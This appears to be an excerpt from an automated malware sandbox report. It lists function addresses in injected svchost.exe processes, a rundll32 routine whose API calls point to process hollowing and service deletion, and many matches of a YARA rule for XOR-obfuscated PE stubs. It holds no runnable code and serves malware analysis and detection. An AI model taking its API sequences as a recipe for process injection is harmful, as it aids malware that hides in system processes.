Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D5280
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D92C0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D100100
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D8100
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D11A116
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0E1150
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0E8190
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D1179DC
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0E51D0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0EE450
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0FE480
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0FBC8D
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0F0CB0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0EB4B0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0F72F0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0FC31E
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0F8310
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D102360
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D7380
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0DEBD0
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7C9A02E8
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17881150
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1788F5E0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17890CB0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1788E450
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1787EBD0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178972F0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17898310
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1789C31E
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178A2360
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17875280
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178792C0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1787E200
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178B026C
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17888190
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178B79DC
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178851D0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17878100
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178A0100
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178BA116
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17894070
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178B48CC
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178A08E0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178A680C
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17886010
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178AA068
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17872FA0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17888FB0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178B9EFD
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1787F730
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1788CF50
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1788C6B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178ABEE0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17880E00
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17884E00
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17886E10
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1789BE25
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17879640
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17884660
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1789C575
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178AC5B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178ADDC4
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1789BC8D
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1789E480
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1788B4B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17877380
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1980ACA8
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198044D4
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19805AE8
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19821731
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198245C0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19821D97
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1987B510
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1984C530
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19834480
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198894C0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1989C410
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19832430
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1984B380
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198AC380
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198493E0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198953E0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198A8740
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198816E0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198745F0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1984F5F0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1982A600
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1985D64A
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198D7654
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1984A660
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198D6910
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1988C950
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198D88B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198D88B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1987C8D0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198358E0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198E1844
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19890844
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1983285B
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19896780
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198237AF
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19899AF0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19842B10
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19898A90
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198A1AA0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19829A20
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198D9A34
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19846A50
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19880A60
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1985DD37
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19850D40
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19839D55
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198DEC74
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1984EC80
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19887C80
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19855CD0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19829CE0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19838C20
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19865C30
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198B3C60
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19857B80
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19885BAD
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198B1BD0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198A7F20
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1985CF3F
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1984FE00
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198E3E20
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1984AE40
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19825080
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19828090
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19834FF0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1987BFF0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198B3030
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198ADF70
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1989033F
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19867270
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1989B2B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1982A210
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19898260
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19887190
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198BB1B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E174902E8
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339F5E0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339B4B0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33A0CB0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33ABC8D
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33AC575
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F338EBD0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33AE480
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339E450
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33892C0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33A72F0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33AC31E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EC98E0 GetVersionExW,GetProcAddress,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,WaitForSingleObject,CloseHandle,WaitForSingleObject,OpenThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,
Source: MSIFBC3.tmp.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MSIFBC3.tmp.10.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: MSIFBC3.tmp.10.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-JDQA9.tmp.11.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: is-JDQA9.tmp.11.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\System32\msiexec.exe | Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EC3A20 OpenSCManagerW,OpenServiceW,QueryServiceStatus,ControlService,Sleep,DeleteService,wsprintfW,SHDeleteKeyW,CloseServiceHandle,CloseServiceHandle,
Matched rule (for every source listed below): SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 27.2.svchost.exe.2743a320000.0.unpack, type: UNPACKEDPE
Source: 34.2.svchost.exe.202b28f0000.0.unpack, type: UNPACKEDPE
Source: 20.2.svchost.exe.1d91aad0000.0.unpack, type: UNPACKEDPE
Source: 24.2.svchost.exe.1dc51fb0000.0.unpack, type: UNPACKEDPE
Source: 37.2.svchost.exe.1afba170000.0.unpack, type: UNPACKEDPE
Source: 13.2.rundll32.exe.4eb0000.0.unpack, type: UNPACKEDPE
Source: 28.2.svchost.exe.1111ac00000.0.unpack, type: UNPACKEDPE
Source: 30.2.svchost.exe.1be5cd40000.0.unpack, type: UNPACKEDPE
Source: 16.2.svchost.exe.12e17870000.0.unpack, type: UNPACKEDPE
Source: 28.0.svchost.exe.1111ac00000.0.unpack, type: UNPACKEDPE
Source: 34.0.svchost.exe.202b28f0000.0.unpack, type: UNPACKEDPE
Source: 25.2.svchost.exe.2216b8b0000.0.raw.unpack, type: UNPACKEDPE
Source: 17.0.svchost.exe.204f3380000.0.unpack, type: UNPACKEDPE
Source: 34.0.svchost.exe.202b28f0000.0.raw.unpack, type: UNPACKEDPE
Source: 38.0.svchost.exe.25c96c80000.0.raw.unpack, type: UNPACKEDPE
Source: 27.2.svchost.exe.2743a320000.0.raw.unpack, type: UNPACKEDPE
Source: 37.0.svchost.exe.1afba170000.0.unpack, type: UNPACKEDPE
Source: 19.2.svchost.exe.233426d0000.0.unpack, type: UNPACKEDPE
Source: 22.0.svchost.exe.222cab20000.0.raw.unpack, type: UNPACKEDPE
Source: 25.0.svchost.exe.2216b8b0000.0.raw.unpack, type: UNPACKEDPE
Source: 30.0.svchost.exe.1be5cd40000.0.raw.unpack, type: UNPACKEDPE
Source: 14.0.svchost.exe.24b7d0d0000.0.raw.unpack, type: UNPACKEDPE
Source: 24.0.svchost.exe.1dc51fb0000.0.unpack, type: UNPACKEDPE
Source: 21.0.svchost.exe.2f2c5c00000.0.raw.unpack, type: UNPACKEDPE
Source: 17.2.svchost.exe.204f3380000.0.raw.unpack, type: UNPACKEDPE
Source: 37.2.svchost.exe.1afba170000.0.raw.unpack, type: UNPACKEDPE
Source: 28.2.svchost.exe.1111ac00000.0.raw.unpack, type: UNPACKEDPE
Source: 31.2.svchost.exe.21c23140000.0.raw.unpack, type: UNPACKEDPE
Source: 23.2.svchost.exe.28621cd0000.0.unpack, type: UNPACKEDPE
Source: 27.0.svchost.exe.2743a320000.0.raw.unpack, type: UNPACKEDPE
Source: 30.2.svchost.exe.1be5cd40000.0.raw.unpack, type: UNPACKEDPE
Source: 29.0.svchost.exe.22f12740000.0.unpack, type: UNPACKEDPE
Source: 28.0.svchost.exe.1111ac00000.0.raw.unpack, type: UNPACKEDPE
Source: 23.0.svchost.exe.28621cd0000.0.unpack, type: UNPACKEDPE
Source: 29.2.svchost.exe.22f12740000.0.unpack, type: UNPACKEDPE
Source: 31.2.svchost.exe.21c23140000.0.unpack, type: UNPACKEDPE
Source: 13.2.rundll32.exe.4eb0000.0.raw.unpack, type: UNPACKEDPE
Source: 31.0.svchost.exe.21c23140000.0.unpack, type: UNPACKEDPE
Source: 27.0.svchost.exe.2743a320000.0.unpack, type: UNPACKEDPE
Source: 25.2.svchost.exe.2216b8b0000.0.unpack, type: UNPACKEDPE
Source: 17.2.svchost.exe.204f3380000.0.unpack, type: UNPACKEDPE
Source: 21.0.svchost.exe.2f2c5c00000.0.unpack, type: UNPACKEDPE
Source: 38.2.svchost.exe.25c96c80000.0.raw.unpack, type: UNPACKEDPE
Source: 14.2.svchost.exe.24b7d0d0000.0.unpack, type: UNPACKEDPE
Source: 34.2.svchost.exe.202b28f0000.0.raw.unpack, type: UNPACKEDPE
Source: 30.0.svchost.exe.1be5cd40000.0.unpack, type: UNPACKEDPE
Source: 14.2.svchost.exe.24b7d0d0000.0.raw.unpack, type: UNPACKEDPE
Source: 38.0.svchost.exe.25c96c80000.0.unpack, type: UNPACKEDPE
Source: 22.2.svchost.exe.222cab20000.0.unpack, type: UNPACKEDPE
Source: 22.0.svchost.exe.222cab20000.0.unpack, type: UNPACKEDPE
Source: 19.0.svchost.exe.233426d0000.0.unpack, type: UNPACKEDPE
Source: 31.0.svchost.exe.21c23140000.0.raw.unpack, type: UNPACKEDPE
Source: 19.0.svchost.exe.233426d0000.0.raw.unpack, type: UNPACKEDPE
Source: 23.2.svchost.exe.28621cd0000.0.raw.unpack, type: UNPACKEDPE
Source: 20.2.svchost.exe.1d91aad0000.0.raw.unpack, type: UNPACKEDPE
Source: 24.0.svchost.exe.1dc51fb0000.0.raw.unpack, type: UNPACKEDPE
Source: 29.2.svchost.exe.22f12740000.0.raw.unpack, type: UNPACKEDPE
Source: 17.0.svchost.exe.204f3380000.0.raw.unpack, type: UNPACKEDPE
Source: 22.2.svchost.exe.222cab20000.0.raw.unpack, type: UNPACKEDPE
Source: 29.0.svchost.exe.22f12740000.0.raw.unpack, type: UNPACKEDPE
Source: 21.2.svchost.exe.2f2c5c00000.0.raw.unpack, type: UNPACKEDPE
Source: 21.2.svchost.exe.2f2c5c00000.0.unpack, type: UNPACKEDPE
Source: 16.2.svchost.exe.12e17870000.0.raw.unpack, type: UNPACKEDPE
Source: 19.2.svchost.exe.233426d0000.0.raw.unpack, type: UNPACKEDPE
Source: 20.0.svchost.exe.1d91aad0000.0.raw.unpack, type: UNPACKEDPE
Source: 25.0.svchost.exe.2216b8b0000.0.unpack, type: UNPACKEDPE
Source: 38.2.svchost.exe.25c96c80000.0.unpack, type: UNPACKEDPE
Source: 23.0.svchost.exe.28621cd0000.0.raw.unpack, type: UNPACKEDPE
Source: 24.2.svchost.exe.1dc51fb0000.0.raw.unpack, type: UNPACKEDPE
Source: 37.0.svchost.exe.1afba170000.0.raw.unpack, type: UNPACKEDPE
Source: 14.0.svchost.exe.24b7d0d0000.0.unpack, type: UNPACKEDPE
Source: 20.0.svchost.exe.1d91aad0000.0.unpack, type: UNPACKEDPE
Source: 00000014.00000003.340502864.000001D91AA60000.00000004.00000001.sdmp, type: MEMORY
Source: 00000015.00000003.343737038.000002F2C5B90000.00000004.00000001.sdmp, type: MEMORY
Source: 0000001E.00000003.383962907.000001BE5C730000.00000004.00000001.sdmp, type: MEMORY
Source: 00000022.00000000.397199381.00000202B28F0000.00000040.00000001.sdmp, type: MEMORY
Source: 0000001D.00000003.379846771.0000022F12180000.00000004.00000001.sdmp, type: MEMORY
Source: 00000025.00000000.402119778.000001AFBA170000.00000040.00000001.sdmp, type: MEMORY
Source: 00000026.00000002.829615785.0000025C96C80000.00000040.00000001.sdmp, type: MEMORY
Source: 00000019.00000003.363362333.000002216B840000.00000004.00000001.sdmp, type: MEMORY
Source: 00000010.00000002.814263097.0000012E17674000.00000004.00000001.sdmp, type: MEMORY
Source: 00000018.00000002.815503783.000001DC51FB0000.00000040.00000001.sdmp, type: MEMORY
Source: 0000001F.00000000.389374530.0000021C23140000.00000040.00000001.sdmp, type: MEMORY
Source: 00000010.00000003.423845789.0000012E1768F000.00000004.00000001.sdmp, type: MEMORY
Source: 00000010.00000003.341269563.0000012E17682000.00000004.00000001.sdmp, type: MEMORY
Source: 00000025.00000002.820529720.000001AFBA170000.00000040.00000001.sdmp, type: MEMORY
Source: 00000015.00000002.823826621.000002F2C5C00000.00000040.00000001.sdmp, type: MEMORY
Source: 00000013.00000000.337739160.00000233426D0000.00000040.00000001.sdmp, type: MEMORY
Source: 00000014.00000002.813792020.000001D91AAD0000.00000040.00000001.sdmp, type: MEMORY
Source: 00000010.00000003.423609117.0000012E1768F000.00000004.00000001.sdmp, type: MEMORY
Source: 0000000D.00000002.415787297.0000000004D00000.00000004.00000001.sdmp, type: MEMORY
Source: 0000000E.00000003.327914667.0000024B7D060000.00000004.00000001.sdmp, type: MEMORY
Source: 00000010.00000003.428213354.0000012E1768F000.00000004.00000001.sdmp, type: MEMORY
Source: 00000017.00000002.815819484.0000028621CD0000.00000040.00000001.sdmp, type: MEMORY
Source: 00000013.00000003.337258636.0000023342660000.00000004.00000001.sdmp, type: MEMORY
Source: 0000001E.00000000.384736630.000001BE5CD40000.00000040.00000001.sdmp, type: MEMORY
Source: 0000001F.00000003.387366099.0000021C22B80000.00000004.00000001.sdmp, type: MEMORY
Source: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY
Source: 0000001B.00000002.832381229.000002743A320000.00000040.00000001.sdmp, type: MEMORY
Source: 00000014.00000000.341208175.000001D91AAD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001C.00000002.813715548.000001111AC00000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000026.00000003.406745863.0000025C96370000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000016.00000003.347514859.00000222CAAB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.425960077.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001B.00000000.373121190.000002743A320000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000016.00000002.815078501.00000222CAB20000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.422182454.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000011.00000000.334220088.00000204F3380000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001B.00000003.369691335.000002743A2B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000017.00000003.351653681.0000028621C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000002.818890783.0000012E17800000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000025.00000003.400991197.000001AFBA100000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000016.00000000.348676580.00000222CAB20000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001F.00000002.812231248.0000021C23140000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000015.00000000.344698282.000002F2C5C00000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000011.00000002.535149996.00000204F3380000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000000E.00000000.328311763.0000024B7D0D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001C.00000000.376992650.000001111AC00000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001C.00000003.376362360.000001111A990000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001D.00000002.816236528.0000022F12740000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000018.00000000.360038212.000001DC51FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000011.00000003.332207196.00000204F3310000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000022.00000002.818183114.00000202B28F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001E.00000002.817922653.000001BE5CD40000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000019.00000002.819987063.000002216B8B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
